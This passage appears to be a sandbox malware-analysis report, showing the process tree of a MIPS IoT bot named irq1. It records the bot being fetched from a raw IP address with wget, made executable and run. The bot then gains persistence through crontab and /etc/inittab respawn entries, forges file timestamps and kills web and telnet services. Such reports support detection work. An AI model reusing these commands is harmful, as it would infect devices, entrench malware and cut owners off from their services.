          • irq0 New Fork (PID: 8977, Parent: 8489)
          • irq0 New Fork (PID: 8979, Parent: 8489)
          • irq0 New Fork (PID: 9213, Parent: 8489)
          • irq0 New Fork (PID: 9214, Parent: 8489)
          • irq0 New Fork (PID: 9215, Parent: 8489)
          • irq0 New Fork (PID: 9216, Parent: 8489)
          • irq0 New Fork (PID: 9231, Parent: 8489)
          • irq0 New Fork (PID: 9232, Parent: 8489)
          • irq0 New Fork (PID: 9233, Parent: 8489)
          • irq0 New Fork (PID: 9234, Parent: 8489)
          • irq0 New Fork (PID: 9235, Parent: 8489)
          • irq0 New Fork (PID: 9261, Parent: 8489)
          • irq0 New Fork (PID: 9266, Parent: 8489)
          • irq0 New Fork (PID: 9267, Parent: 8489)
          • irq0 New Fork (PID: 9304, Parent: 8489)
          • irq0 New Fork (PID: 9305, Parent: 8489)
          • irq0 New Fork (PID: 9306, Parent: 8489)
          • irq0 New Fork (PID: 9312, Parent: 8489)
          • irq0 New Fork (PID: 9313, Parent: 8489)
          • irq0 New Fork (PID: 9314, Parent: 8489)
          • irq0 New Fork (PID: 9315, Parent: 8489)
          • irq0 New Fork (PID: 9316, Parent: 8489)
          • irq0 New Fork (PID: 9356, Parent: 8489)
          • irq0 New Fork (PID: 9357, Parent: 8489)
          • irq0 New Fork (PID: 9358, Parent: 8489)
          • irq0 New Fork (PID: 9359, Parent: 8489)
          • irq0 New Fork (PID: 9360, Parent: 8489)
          • irq0 New Fork (PID: 9361, Parent: 8489)
          • irq0 New Fork (PID: 9362, Parent: 8489)
          • irq0 New Fork (PID: 9363, Parent: 8489)
          • irq0 New Fork (PID: 9364, Parent: 8489)
          • irq0 New Fork (PID: 9365, Parent: 8489)
          • irq0 New Fork (PID: 9366, Parent: 8489)
          • irq0 New Fork (PID: 9383, Parent: 8489)
          • irq0 New Fork (PID: 9384, Parent: 8489)
          • irq0 New Fork (PID: 9385, Parent: 8489)
          • irq0 New Fork (PID: 9389, Parent: 8489)
          • irq0 New Fork (PID: 9390, Parent: 8489)
          • irq0 New Fork (PID: 9393, Parent: 8489)
          • irq0 New Fork (PID: 9394, Parent: 8489)
          • irq0 New Fork (PID: 9395, Parent: 8489)
          • irq0 New Fork (PID: 9396, Parent: 8489)
          • irq0 New Fork (PID: 9425, Parent: 8489)
          • irq0 New Fork (PID: 9426, Parent: 8489)
          • irq0 New Fork (PID: 9427, Parent: 8489)
          • irq0 New Fork (PID: 9428, Parent: 8489)
          • irq0 New Fork (PID: 9429, Parent: 8489)
          • irq0 New Fork (PID: 9430, Parent: 8489)
          • irq0 New Fork (PID: 9431, Parent: 8489)
          • irq0 New Fork (PID: 9432, Parent: 8489)
          • irq0 New Fork (PID: 9433, Parent: 8489)
          • irq0 New Fork (PID: 9434, Parent: 8489)
          • irq0 New Fork (PID: 9472, Parent: 8489)
          • irq0 New Fork (PID: 9473, Parent: 8489)
          • irq0 New Fork (PID: 9474, Parent: 8489)
          • irq0 New Fork (PID: 9475, Parent: 8489)
          • irq0 New Fork (PID: 9476, Parent: 8489)
          • irq0 New Fork (PID: 9477, Parent: 8489)
          • irq0 New Fork (PID: 9478, Parent: 8489)
          • irq0 New Fork (PID: 9479, Parent: 8489)
          • irq0 New Fork (PID: 9480, Parent: 8489)
          • irq0 New Fork (PID: 9481, Parent: 8489)
          • irq0 New Fork (PID: 9482, Parent: 8489)
          • irq0 New Fork (PID: 9483, Parent: 8489)
          • irq0 New Fork (PID: 9509, Parent: 8489)
          • irq0 New Fork (PID: 9510, Parent: 8489)
          • irq0 New Fork (PID: 9511, Parent: 8489)
          • irq0 New Fork (PID: 9512, Parent: 8489)
          • irq0 New Fork (PID: 9513, Parent: 8489)
          • irq0 New Fork (PID: 9514, Parent: 8489)
          • irq0 New Fork (PID: 9515, Parent: 8489)
          • irq0 New Fork (PID: 9516, Parent: 8489)
          • irq0 New Fork (PID: 9555, Parent: 8489)
          • irq0 New Fork (PID: 9556, Parent: 8489)
          • irq0 New Fork (PID: 9558, Parent: 8489)
          • irq0 New Fork (PID: 9559, Parent: 8489)
          • irq0 New Fork (PID: 9560, Parent: 8489)
          • irq0 New Fork (PID: 9575, Parent: 8489)
          • irq0 New Fork (PID: 9576, Parent: 8489)
          • irq0 New Fork (PID: 9577, Parent: 8489)
          • irq0 New Fork (PID: 9578, Parent: 8489)
          • irq0 New Fork (PID: 9579, Parent: 8489)
          • irq0 New Fork (PID: 9580, Parent: 8489)
          • irq0 New Fork (PID: 9604, Parent: 8489)
          • irq0 New Fork (PID: 9605, Parent: 8489)
          • irq0 New Fork (PID: 9606, Parent: 8489)
          • irq0 New Fork (PID: 9607, Parent: 8489)
          • irq0 New Fork (PID: 9608, Parent: 8489)
          • irq0 New Fork (PID: 9609, Parent: 8489)
          • irq0 New Fork (PID: 9610, Parent: 8489)
          • irq0 New Fork (PID: 9611, Parent: 8489)
          • irq0 New Fork (PID: 9612, Parent: 8489)
          • irq0 New Fork (PID: 9613, Parent: 8489)
          • irq0 New Fork (PID: 9614, Parent: 8489)
          • irq0 New Fork (PID: 9615, Parent: 8489)
          • irq0 New Fork (PID: 9638, Parent: 8489)
          • irq0 New Fork (PID: 9639, Parent: 8489)
          • irq0 New Fork (PID: 9640, Parent: 8489)
          • irq0 New Fork (PID: 9641, Parent: 8489)
          • irq0 New Fork (PID: 9642, Parent: 8489)
          • irq0 New Fork (PID: 9650, Parent: 8489)
          • irq0 New Fork (PID: 9651, Parent: 8489)
          • irq0 New Fork (PID: 9652, Parent: 8489)
          • irq0 New Fork (PID: 9653, Parent: 8489)
          • irq0 New Fork (PID: 9654, Parent: 8489)
          • irq0 New Fork (PID: 9655, Parent: 8489)
          • irq0 New Fork (PID: 9656, Parent: 8489)
          • irq0 New Fork (PID: 9657, Parent: 8489)
          • irq0 New Fork (PID: 9658, Parent: 8489)
          • irq0 New Fork (PID: 9673, Parent: 8489)
          • irq0 New Fork (PID: 9674, Parent: 8489)
          • irq0 New Fork (PID: 9675, Parent: 8489)
          • irq0 New Fork (PID: 9676, Parent: 8489)
          • irq0 New Fork (PID: 9677, Parent: 8489)
          • irq0 New Fork (PID: 9678, Parent: 8489)
          • irq0 New Fork (PID: 9679, Parent: 8489)
          • irq0 New Fork (PID: 9680, Parent: 8489)
          • irq0 New Fork (PID: 9681, Parent: 8489)
          • irq0 New Fork (PID: 9682, Parent: 8489)
          • irq0 New Fork (PID: 9683, Parent: 8489)
          • irq0 New Fork (PID: 9698, Parent: 8489)
          • irq0 New Fork (PID: 9703, Parent: 8489)
          • irq0 New Fork (PID: 9704, Parent: 8489)
          • irq0 New Fork (PID: 9705, Parent: 8489)
          • irq0 New Fork (PID: 9706, Parent: 8489)
          • irq0 New Fork (PID: 9707, Parent: 8489)
          • irq0 New Fork (PID: 9708, Parent: 8489)
          • irq0 New Fork (PID: 9709, Parent: 8489)
          • irq0 New Fork (PID: 9710, Parent: 8489)
          • irq0 New Fork (PID: 9711, Parent: 8489)
          • irq0 New Fork (PID: 9722, Parent: 8489)
          • irq0 New Fork (PID: 9725, Parent: 8489)
          • irq0 New Fork (PID: 9727, Parent: 8489)
          • irq0 New Fork (PID: 9728, Parent: 8489)
          • irq0 New Fork (PID: 9732, Parent: 8489)
          • irq0 New Fork (PID: 9733, Parent: 8489)
          • irq0 New Fork (PID: 9734, Parent: 8489)
          • irq0 New Fork (PID: 9739, Parent: 8489)
          • irq0 New Fork (PID: 9740, Parent: 8489)
          • irq0 New Fork (PID: 9743, Parent: 8489)
          • irq0 New Fork (PID: 9744, Parent: 8489)
          • irq0 New Fork (PID: 9745, Parent: 8489)
          • irq0 New Fork (PID: 9746, Parent: 8489)
          • irq0 New Fork (PID: 9747, Parent: 8489)
          • irq0 New Fork (PID: 9752, Parent: 8489)
          • irq0 New Fork (PID: 9753, Parent: 8489)
          • irq0 New Fork (PID: 9754, Parent: 8489)
          • irq0 New Fork (PID: 9755, Parent: 8489)
          • irq0 New Fork (PID: 9756, Parent: 8489)
          • irq0 New Fork (PID: 9757, Parent: 8489)
          • irq0 New Fork (PID: 9758, Parent: 8489)
          • irq0 New Fork (PID: 9759, Parent: 8489)
          • irq0 New Fork (PID: 9772, Parent: 8489)
          • irq0 New Fork (PID: 9773, Parent: 8489)
          • irq0 New Fork (PID: 9774, Parent: 8489)
          • irq0 New Fork (PID: 9775, Parent: 8489)
          • irq0 New Fork (PID: 9776, Parent: 8489)
    • sh New Fork (PID: 5286, Parent: 4579)
    • wget (PID: 5286, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/irq1 -O irq1
    • sh New Fork (PID: 5856, Parent: 4579)
    • chmod (PID: 5856, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x irq1
    • sh New Fork (PID: 5864, Parent: 4579)
    • chmod (PID: 5864, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 irq1
    • sh New Fork (PID: 5875, Parent: 4579)
    • irq1 (PID: 5875, Parent: 4579, MD5: unknown) Arguments: /usr/bin/qemu-mips ./irq1
      • irq1 New Fork (PID: 6071, Parent: 5875)
      • sh (PID: 6071, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "chmod 700 /tmp/irq1 > /dev/null 2>&1 &"
        • sh New Fork (PID: 6073, Parent: 6071)
        • chmod (PID: 6073, Parent: 6071, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /tmp/irq1
      • irq1 New Fork (PID: 6075, Parent: 5875)
      • sh (PID: 6075, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /tmp/irq1"
        • sh New Fork (PID: 6100, Parent: 6075)
        • touch (PID: 6100, Parent: 6075, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /tmp/irq1
      • irq1 New Fork (PID: 6105, Parent: 5875)
      • sh (PID: 6105, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "(crontab -l | grep -v \"/tmp/irq1\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
        • sh New Fork (PID: 6111, Parent: 6105)
          • sh New Fork (PID: 6119, Parent: 6111)
          • crontab (PID: 6119, Parent: 6111, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
          • sh New Fork (PID: 6120, Parent: 6111)
          • grep (PID: 6120, Parent: 6111, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq1
          • sh New Fork (PID: 6121, Parent: 6111)
          • grep (PID: 6121, Parent: 6111, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v "no cron"
          • sh New Fork (PID: 6122, Parent: 6111)
          • grep (PID: 6122, Parent: 6111, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v lesshts/run.sh
      • irq1 New Fork (PID: 6156, Parent: 5875)
      • sh (PID: 6156, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"* * * * * /tmp/irq1 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
      • irq1 New Fork (PID: 6161, Parent: 5875)
      • sh (PID: 6161, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "crontab /var/run/.x00740882966"
        • sh New Fork (PID: 6173, Parent: 6161)
        • crontab (PID: 6173, Parent: 6161, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab /var/run/.x00740882966
      • irq1 New Fork (PID: 6197, Parent: 5875)
      • sh (PID: 6197, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/.x00740882966"
        • sh New Fork (PID: 6237, Parent: 6197)
        • rm (PID: 6237, Parent: 6197, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/.x00740882966
      • irq1 New Fork (PID: 6251, Parent: 5875)
      • sh (PID: 6251, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/irq1\" > /etc/inittab2"
        • sh New Fork (PID: 6259, Parent: 6251)
        • cat (PID: 6259, Parent: 6251, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab
        • sh New Fork (PID: 6260, Parent: 6251)
        • grep (PID: 6260, Parent: 6251, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq1
      • irq1 New Fork (PID: 6292, Parent: 5875)
      • sh (PID: 6292, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/irq1\" >> /etc/inittab2"
      • irq1 New Fork (PID: 6330, Parent: 5875)
      • sh (PID: 6330, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 6374, Parent: 6330)
        • cat (PID: 6374, Parent: 6330, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab2
      • irq1 New Fork (PID: 6385, Parent: 5875)
      • sh (PID: 6385, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 6399, Parent: 6385)
        • rm (PID: 6399, Parent: 6385, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /etc/inittab2
      • irq1 New Fork (PID: 6414, Parent: 5875)
      • sh (PID: 6414, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 6439, Parent: 6414)
        • touch (PID: 6439, Parent: 6414, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /etc/inittab
      • irq1 New Fork (PID: 6469, Parent: 5875)
        • irq1 New Fork (PID: 6488, Parent: 6469)
        • sh (PID: 6488, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 6544, Parent: 6488)
          • uname (PID: 6544, Parent: 6488, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq1 New Fork (PID: 6547, Parent: 6469)
        • sh (PID: 6547, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 6573, Parent: 6547)
          • uname (PID: 6573, Parent: 6547, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq1 New Fork (PID: 6601, Parent: 6469)
        • sh (PID: 6601, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 6605, Parent: 6601)
          • uname (PID: 6605, Parent: 6601, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq1 New Fork (PID: 7191, Parent: 6469)
        • sh (PID: 7191, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 7194, Parent: 7191)
            • sh New Fork (PID: 7199, Parent: 7194)
            • cat (PID: 7199, Parent: 7194, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/httpd.pid
        • irq1 New Fork (PID: 7195, Parent: 6469)
        • sh (PID: 7195, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service httpd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 7205, Parent: 7195)
          • service (PID: 7205, Parent: 3310, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service httpd stop
            • service New Fork (PID: 7209, Parent: 7205)
            • basename (PID: 7209, Parent: 7205, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7227, Parent: 7205)
            • basename (PID: 7227, Parent: 7205, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7235, Parent: 7205)
            • systemctl (PID: 7235, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 7298, Parent: 7205)
              • service New Fork (PID: 7303, Parent: 7298)
              • systemctl (PID: 7303, Parent: 7298, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 7305, Parent: 7298)
              • sed (PID: 7305, Parent: 7298, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 7560, Parent: 7205)
            • systemctl (PID: 7560, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 7607, Parent: 7205)
            • systemctl (PID: 7607, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 7627, Parent: 7205)
            • systemctl (PID: 7627, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 7662, Parent: 7205)
            • systemctl (PID: 7662, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 7673, Parent: 7205)
            • systemctl (PID: 7673, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 7707, Parent: 7205)
            • systemctl (PID: 7707, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 7743, Parent: 7205)
            • systemctl (PID: 7743, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 7754, Parent: 7205)
            • systemctl (PID: 7754, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 7789, Parent: 7205)
            • systemctl (PID: 7789, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 7823, Parent: 7205)
            • systemctl (PID: 7823, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 7836, Parent: 7205)
            • systemctl (PID: 7836, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 7876, Parent: 7205)
            • systemctl (PID: 7876, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 7904, Parent: 7205)
            • systemctl (PID: 7904, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 7931, Parent: 7205)
            • systemctl (PID: 7931, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 7958, Parent: 7205)
            • systemctl (PID: 7958, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 7985, Parent: 7205)
            • systemctl (PID: 7985, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 8004, Parent: 7205)
            • systemctl (PID: 8004, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 8039, Parent: 7205)
            • systemctl (PID: 8039, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 8066, Parent: 7205)
            • systemctl (PID: 8066, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 8093, Parent: 7205)
            • systemctl (PID: 8093, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 8102, Parent: 7205)
            • systemctl (PID: 8102, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 8142, Parent: 7205)
            • systemctl (PID: 8142, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 8162, Parent: 7205)
            • systemctl (PID: 8162, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 8191, Parent: 7205)
            • systemctl (PID: 8191, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 7205, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop httpd.service
        • irq1 New Fork (PID: 7206, Parent: 6469)
        • sh (PID: 7206, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7222, Parent: 7206)
          • killall (PID: 7222, Parent: 7206, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mini_httpd
        • irq1 New Fork (PID: 7228, Parent: 6469)
        • sh (PID: 7228, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7232, Parent: 7228)
          • killall (PID: 7232, Parent: 7228, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 minihttpd
        • irq1 New Fork (PID: 7236, Parent: 6469)
        • sh (PID: 7236, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 7290, Parent: 7236)
            • sh New Fork (PID: 7292, Parent: 7290)
            • cat (PID: 7292, Parent: 7290, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/thttpd.pid
        • irq1 New Fork (PID: 7296, Parent: 6469)
        • sh (PID: 7296, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
        • irq1 New Fork (PID: 7344, Parent: 6469)
        • sh (PID: 7344, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set http_enable=0 > /dev/null 2>&1"
        • irq1 New Fork (PID: 7349, Parent: 6469)
        • sh (PID: 7349, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7363, Parent: 7349)
          • killall (PID: 7363, Parent: 7349, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 httpd
        • irq1 New Fork (PID: 7365, Parent: 6469)
        • sh (PID: 7365, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service telnetd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 7379, Parent: 7365)
          • service (PID: 7379, Parent: 7365, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service telnetd stop
            • service New Fork (PID: 7398, Parent: 7379)
            • basename (PID: 7398, Parent: 7379, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7407, Parent: 7379)
            • basename (PID: 7407, Parent: 7379, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7436, Parent: 7379)
            • systemctl (PID: 7436, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 7562, Parent: 7379)
              • service New Fork (PID: 7564, Parent: 7562)
              • systemctl (PID: 7564, Parent: 7562, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 7565, Parent: 7562)
              • sed (PID: 7565, Parent: 7562, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 7616, Parent: 7379)
            • systemctl (PID: 7616, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 7626, Parent: 7379)
            • systemctl (PID: 7626, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 7661, Parent: 7379)
            • systemctl (PID: 7661, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 7671, Parent: 7379)
            • systemctl (PID: 7671, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 7708, Parent: 7379)
            • systemctl (PID: 7708, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 7742, Parent: 7379)
            • systemctl (PID: 7742, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 7755, Parent: 7379)
            • systemctl (PID: 7755, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 7788, Parent: 7379)
            • systemctl (PID: 7788, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 7824, Parent: 7379)
            • systemctl (PID: 7824, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 7856, Parent: 7379)
            • systemctl (PID: 7856, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 7878, Parent: 7379)
            • systemctl (PID: 7878, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 7905, Parent: 7379)
            • systemctl (PID: 7905, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 7932, Parent: 7379)
            • systemctl (PID: 7932, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 7959, Parent: 7379)
            • systemctl (PID: 7959, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 7986, Parent: 7379)
            • systemctl (PID: 7986, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 8005, Parent: 7379)
            • systemctl (PID: 8005, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 8043, Parent: 7379)
            • systemctl (PID: 8043, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 8068, Parent: 7379)
            • systemctl (PID: 8068, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 8094, Parent: 7379)
            • systemctl (PID: 8094, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 8129, Parent: 7379)
            • systemctl (PID: 8129, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 8153, Parent: 7379)
            • systemctl (PID: 8153, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 8183, Parent: 7379)
            • systemctl (PID: 8183, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 8210, Parent: 7379)
            • systemctl (PID: 8210, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 8256, Parent: 7379)
            • systemctl (PID: 8256, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 7379, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop telnetd.service
